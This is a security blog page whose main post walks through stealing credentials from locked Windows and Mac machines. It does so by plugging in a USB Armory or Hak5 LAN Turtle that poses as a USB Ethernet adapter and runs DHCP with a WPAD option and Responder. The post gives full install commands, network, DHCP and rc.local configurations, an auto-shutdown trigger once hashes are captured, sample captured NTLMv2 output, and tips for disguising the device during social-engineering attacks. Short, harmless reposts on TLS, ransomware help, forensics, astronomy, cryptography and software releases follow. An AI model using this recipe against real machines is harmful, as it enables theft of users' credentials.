Snagging creds from locked machines

Saturday, 10-September-2016 Leave a comment

 

First off, this is dead simple and shouldn’t work, but it does. Also, there is no possible way that I’m the first one that has identified this, but here it is (trust me, I tested it so many ways to confirm it because I couldn’t believe it was true)

TL;DR USB Ethernet + DHCP + Responder == Creds

Thesis:

If I plug in a device that masquerades as a USB Ethernet adapter and has a computer on the other end, can I capture credentials from a system, even when locked out (yes, logged in, just locked). (..or do even more, but we’ll save that for another time, this post is already too long)

Device Setup

I started off with a USB Armory ($155) but below I’ll show you how to do this with a Hak5 Turtle ($49.99) as well.

I’ll leave the setting up of the base device itself to you, but here are some links that can start you on your way:

USB Armory
Hak5 Turtle

Tools

Basically the capturing is done with Laurent Gaffié’s Responder so you need to find a way to get Responder onto the device. The Hak5 Turtle already has a module for it:

You do have to “Enable” the module for the first time (plugged into Internet access) to get it to actually download all of dependencies and package itself.

Then you also need to do a opkg update and opkg install python-openssl so that Responder will run correctly. This is only a temporary issue as the module is being fixed to include this step.

As for the USB Armory is you can either use SCP, Internet Connection Sharing, the USB host/client adapter:

The default install of Debian/Jessie doesn’t have Python installed so you will have to work through all of the dependencies (on the Kali version this is not needed) and will require Internet access to perform:

apt-get install -y python git python-pip python-dev screen sqlite3
pip install pycrypto
git clone https://github.com/spiderlabs/responder

Configuration

Armory

First, setting up the interface isn’t needed but it will help with consistence since each image for the Armory come with different default IP addresses and it’s good to set a solid base.

/etc/network/interfaces
# interfaces(5) file used by ifup(8) and ifdown(8)
# Include files from /etc/network/interfaces.d:
source-directory /etc/network/interfaces.d
auto usb0
allow-hotplug usb0
iface usb0 inet static
  address 192.168.2.201
  netmask 255.255.255.0
  gateway 192.168.2.1

Next we set up the DHCP server:

/etc/dhcp/dhcpd.conf
ddns-update-style none;

option domain-name "domain.local";
option domain-name-servers 192.168.2.201;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet 192.168.2.0 netmask 255.255.255.0 {
  range 192.168.2.1 192.168.2.2;
  option routers 192.168.2.201;
  option local-proxy-config "http://192.168.2.201/wpad.dat";
}

The only special configuration here is to send the “Proxy Config” option to any DHCP clients. Why this is even a thing I have no idea, but note this line:

“DHCP has a higher priority than DNS: if DHCP provides the WPAD URL, no DNS lookup is performed.” from the Wikipedia article on WPAD

Next we set up things to automatically run. We edit the rc.local file so that it does a few things:

  1. Clears out all DHCP leases and start the DHCP server. There is probably a more elegant way to do this, but because this “computer” is being plugged in and taken out pretty frequently, we could run into a max in leases but most likely the file will get corrupted at some point so we just remove and re-add it.
  2. Start Responder in a screen session. This way we can get logging going on the screen session as a sort of backup for the Sqlite3 database and log files that Responder creates.
/etc/rc.local
#!/bin/sh -e

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases

# Start DHCP server
/usr/sbin/dhcpd

# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'

exit 0

To enable logging of the screen sessions (which also gives you insight into if anything went wrong), you add a .screenrc file. There is a lot more that I put in these, mostly for aesthetics but the important pieces are these:

/root/.screenrc
# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

That’s it, you should be able to reboot your USB Armory and start picking up creds anywhere you can stick a USB in.

Hak5 Turtle

Everything is pretty much already done for you, the only difference is that opkg is your package manager:

opkg update
opkg install python-openssl screen

Remove the symlink to /tmp/ so that the logs will stick around

rm -rf /overlay/etc/turtle/Responder/logs

And the /overlay/etc/rc.local file is slightly different

/overlay/etc/rc.local
/etc/init.d/dnsmasq stop
/usr/sbin/screen -dmS responder bash -c 'cd /overlay/etc/turtle/Responder; python Responder.py -I br-lan -f -w -r -d -F'

Why does this work?

  1. Because USB is Plug-and-Play. This means that even if a system is locked out, the device still gets installed. Now, I believe there are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list.
  2. Computers are constantly creating traffic, even if you don’t have any browsers or applications open, and most computers trust their local network for some reason (I know the technical bits on ‘why’, just complaining…)
  3. Network preference when there are more than gateway or network connection is based on “metrics” on Windows and a combination of metrics and “preference” on OSX, but by default “wired” and “newer/faster” always win out.

This means that by plugging in the device it quickly becomes the gateway, DNS server, WPAD server and others thanks to Responder.

The average time for freshly inserted into a locked workstation and by the time I have creds is about 13 seconds, all depends on the system. Some addition setup I used inotify to watch for a file change in the Responder.db database and shutdown the Armory. This helps finalize file writes as well and giving me an indicator via the LED that creds were obtained.

To do that you need to install the inotify-tools package and add the following to the rc.local file:

echo "Staring cred watch" >> /root/rc.log
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /root/responder/Responder.db; do shutdown -h now; done'

End Result:

What you see in the video is the Windows 10 lock screen (Full screened fresh install VM). When the LED goes solid white the Armory has fully shutdown because of the watch script, creds achieved!.

Bring it back home and look at the results:

root@wpad:~# sqlite3 /root/responder/Responder.db 'select * from responder'
2016-09-04 10:59:43|HTTP|NTLMv2|192.168.2.1||SITTINGDUCK\mubix||5EAEA2859C397D8AE48CA87F:01010000000001E9D23F49F7891F38965D80A0010000000000000000000000000000000900260048005400540050002F007800780066006600730062006E0070006300000000000000....

Sweet!! Game over!

Tested on:

  • Windows 98 SE
  • Windows 2000 SP4
  • Windows XP SP3
  • Windows 7 SP1
  • Windows 10 (Enterprise and Home)
  • OSX El Capitan / Mavericks (I was able to get creds on both of these but I’m still testing to see if it was a fluke, or my own configurations)

I still have not tested on Linux, I will make a new post on if that works. Please leave comments below if you see things I can improve upon, or errors.

USB Armory vs Hak5 LAN Turtle
  1. The Armory is more versitile with APT package to do more fun, definitely a great way to dev the attack. More storage (SD based) and slightly faster processor
  2. Hak5 LAN Turtle is MUCH easier to pass off when you are trying to plug in a device during an SE attack. It might not have the LED that the Armory does for determining when creds are achieved, but it has the added functionality of a working ethernet port, so you could get creds AND a shell. Definitely worth the extra hassel to get it working right.

Snagging creds from locked machines

Tue, 06 Sep 2016 12:35:28 GMT

Categories: Uncategorized

Transport Layer Security (TLS) False Start

Wednesday, 24-August-2016 Leave a comment

https://www.rfc-editor.org/rfc/rfc7918.txt

Abstract

This document specifies an optional behavior of Transport Layer Security (TLS) client implementations, dubbed "False Start". It affects only protocol timing, not on-the-wire protocol data, and can be implemented unilaterally. A TLS False Start reduces handshake latency to one round trip.

Categories: Uncategorized

NEED HELP unlocking your digital life without paying your attackers*?

Tuesday, 26-July-2016 Leave a comment

https://www.nomoreransom.org/index.html

Ransomware is malware that locks your computer and mobile devices or encrypts your electronic files. When this happens, you can’t get to the data unless you pay a ransom. However this is not guaranteed and you should never pay!

Categories: Uncategorized

We are building a nonprofit search engine for the Web

Wednesday, 20-July-2016 Leave a comment

Sylvain Zimmer@sylvinus Mar 6

I’m starting a new open source project: https://about.commonsearch.org Feedback & contributors welcome!

This is something to get behind. The Internet has been needing this for a very long time. Each time something like this has come up, it has run into one roadblock or another, including being bought out and shutdown.

Categories: Uncategorized

Bills to Establish Federal Forensic Science Office Introduced in Congress

Wednesday, 20-July-2016 Leave a comment

A federal office to establish forensic science standards could be created, as part of legislation introduced in Congress last Friday.

The bills seek to “establish standards and protocols across forensic disciplines,” according to the short summaries.

The legislation comes amid other review of forensic standards that have been used at crime scenes and in courtrooms for decades – and amid growing doubts concerning some disciplines, such as hair follicle analysis and bite marks.

The bills are not yet available online. The drafts (S 3259 and HR 5795) are sponsored by Sen. Richard Blumenthal (D-Conn.) and Rep. Eddie Bernice Johnson (D-TX, 30th Dist.). The pieces of legislation have already been referred to committees.

The establishment of such an office was welcomed by the Innocence Project, which has used evolving DNA methods to overturn 342 wrongful convictions.

“We look forward to working with members of both chambers to pass this critical legislation,” said Peter Neufeld, co-director of the Innocence Project, in a statement. “Providing law enforcement with scientifically-backed forensic tools that aid in accurately identifying the real assailants is the best way to protect everyone’s safety while also insuring that innocent people are not wrongly accused and convicted of crimes they didn’t commit.”

The American Academy of Forensic Sciences did not return a request for comment on the legislation.

A previous bill that would have established an entity called the National Forensic Science Coordinating Office was recommended by the Senate’s Commerce, Science and Transportation Committee in 2014. However, the legislation was not passed. Estimates for the implementation of the office ran to $101 million for the first five years of transition.

READ MORE: National Review of Forensics Underway, Could be ‘Transformational’

Currently, a “transformational” review of national forensic practices is already underway at the American Association for the Advancement of Science.

Ten disciplines are being put under the AAAS microscope. First up is ballistics and tool markers, latent fingerprints and arson investigations. Those are already underway. The next seven are: bloodstain pattern analysis, digital evidence, footwear and tire tracks, bitemark analysis, fiber trace evidence, hair trace evidence, and trace evidence of paint and other coatings, according to the AAAS.

The review was prompted by the National Academy of Sciences scathing report released in 2009 entitled, “Strengthening Forensic Science in the United States: A Path Forward.” 

Categories: Uncategorized

China’s new radio observatory is 200 meters larger than Arecibo

Sunday, 10-July-2016 Leave a comment

 

This photo taken on June 27, 2016 shows the FAST at night. (credit: Xinhua photo/Liu Xu)

For half a century, the US National Science Foundation’s Arecibo telescope, sited in Puerto Rico, has been the world’s largest radio observatory. It measures 305 meters across and among other major discoveries has confirmed the existence of neutron stars. The observatory also featured prominently in the movie Contact.

But now a Chinese observatory has superseded Arecibo. According to China’s Xinhua news service, installation of the 500-meter FAST radio telescope is complete, with the last triangular reflector put into place. The observatory is expected to begin observing the heavens in September.

China has spent $180 million on the telescope since beginning construction in 2011 and will devote the next couple of years to testing and refining the massive instrument. After Chinese researchers receive the initial opportunities to use the telescope the government plans to open it to scientists worldwide, said Peng Bo, director of the NAO Radio Astronomy Technology Laboratory.

Read 2 remaining paragraphs | Comments

China’s new radio observatory is 200 meters larger than Arecibo
Eric Berger
Fri, 08 Jul 2016 22:25:27 GMT

Categories: Uncategorized

HTTPS crypto’s days are numbered. Here’s how Google wants to save it

Sunday, 10-July-2016 Leave a comment

 

(credit: Christiaan Colen)

Like many forms of encryption in use today, HTTPS protections are on the brink of a collapse that could bring down the world as we know it. Hanging in the balance are most encrypted communications sent over the last several decades. On Thursday, Google unveiled an experiment designed to head off, or at least lessen, the catastrophe.

In the coming months, Google servers will add a new, experimental cryptographic algorithm to the more established elliptic curve algorithm it has been using for the past few years to help encrypt HTTPS communications. The algorithm—which goes by the wonky name "Ring Learning With Errors"—is a method of exchanging cryptographic keys that’s currently considered one of the great new hopes in the age of quantum computing. Like other forms of public key encryption, it allows two parties who have never met to encrypt their communications, making it ideal for Internet usage.

Virtually all forms of public key encryption in use today are secured by math problems that are so hard that they take millennia for normal computers to solve. In a world with quantum computers, the same problems take seconds to solve. No one knows precisely when this potential doomsday scenario will occur. Forecasts call for anywhere from 20 to 100 years. But one thing is certain: once working quantum computers are a reality, they will be able to decrypt virtually all of today’s HTTPS communications. Even more unnerving, eavesdroppers who have stashed away decades’ worth of encrypted Internet traffic would suddenly have a way to decrypt all of it.

Read 6 remaining paragraphs | Comments

HTTPS crypto’s days are numbered. Here’s how Google wants to save it
Dan Goodin
Fri, 08 Jul 2016 21:18:45 GMT

Categories: Uncategorized

Huge double boxset of Android patches lands after Qualcomm disk encryption blown open

Sunday, 10-July-2016 Leave a comment

 

What a coincidence

Google has released two bundles of Android security patches this month: a smaller one to handle bugs in the operating system, and a larger package that tackles a raft of driver-level issues, particularly with Qualcomm’s hardware.…

Huge double boxset of Android patches lands after Qualcomm disk encryption blown open
Iain Thomson
Wed, 06 Jul 2016 19:03:10 GMT

Categories: Uncategorized

OpenNTPD 5.7p1 Released

Monday, 19-January-2015 Leave a comment

 

Brent Cook (bcook@), still flush from success in creating the portable version of LibreSSL, has turned his hand to to OpenNTPD:

After a long hiatus, the latest version of OpenNTPD is available once again in a portable release.

  • Support for a new build infrastructure based on the LibreSSL framework. Source code is integrated directly from the OpenBSD tree with few manual changes, easing maintenance.
  • Removed support for several OSes pending test reports and updated portability code.
  • Supports the Simple Network Time Protocol version 4 as described in RFC 5905
  • Added route virtualization (rdomain) support.
  • Added ntpctl(8), which allows for querying ntpd(8) at runtime.
  • Finer-grained clock adjustment via adjfreq / ntp_adjtime where available.
  • Improved latency on heavily-loaded machines.

Hopefully those who’ve repackaged the previous releases for their OSes will update in due course.

OpenNTPD 5.7p1 Released
Fri, 09 Jan 2015 08:48:12 GMT

Categories: Uncategorized Tags: , ,

Announcing EMET 5.0 Technical Preview

Wednesday, 26-February-2014 Leave a comment

Announcing EMET 5.0 Technical Preview

https://blogs.technet.com/b/srd/archive/2014/02/25/announcing-emet-5-0-technical-preview.aspx?Redirected=true

Today, we are thrilled to announce a preview release of the next version of the Enhanced Mitigation Experience Toolkit, better known as EMET. You can download EMET 5.0 Technical Preview here. This Technical Preview introduces new features and enhancements that we expect to be key components of the final EMET 5.0 release. We are releasing this technical preview to gather customer feedback about the new features and enhancements. Your feedback will affect the final EMET 5.0 technical implementation. We encourage you to download this Technical Preview, try it out in a test environment, and let us know how you would like these features and enhancements to show up in the final version. If you are in San Francisco, California, for the RSA Conference USA 2014, please join us at the Microsoft booth (number 3005) for a demo of EMET 5.0 Technical Preview and give us feedback directly in person.  Several members of the EMET team will be demonstrating at the Microsoft booth for the entire Conference.

As mentioned, this Technical Preview release implements new features to disrupt and block the attacks that we have detected and analyzed over the past several months. The techniques used in these attacks have inspired us with new mitigation ideas to disrupt exploitation and raise the cost to write reliable exploits. The EMET 5.0 Technical Preview also implements additional defensive mechanisms to reduce exposure from attacks.

The two new features introduced in EMET 5.0 Technical Preview are the Attack Surface Reduction (ASR) and the Export Address Table Filtering Plus (EAF+). Similar to what we have done with EMET 3.5 Technical Preview, where we introduced a new set of mitigations to counter Return Oriented Programming (ROP), we are introducing these two new mitigations and ask for your feedback on how they can be improved. Of course, they are a “work in progress.” Our goal is to have them polished for the final version of EMET 5.0.

Continue reading the blog post here

Categories: Uncategorized